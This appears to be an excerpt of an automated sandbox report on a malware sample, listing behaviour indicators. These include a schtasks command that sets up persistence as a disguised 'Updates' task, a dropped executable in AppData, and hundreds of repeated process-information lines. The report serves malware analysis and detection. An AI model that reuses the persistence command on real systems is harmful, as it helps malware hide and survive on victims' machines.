Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NPadpxkCGKGoat" /XML "C:\Users\user\AppData\Local\Temp\tmp9B09.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
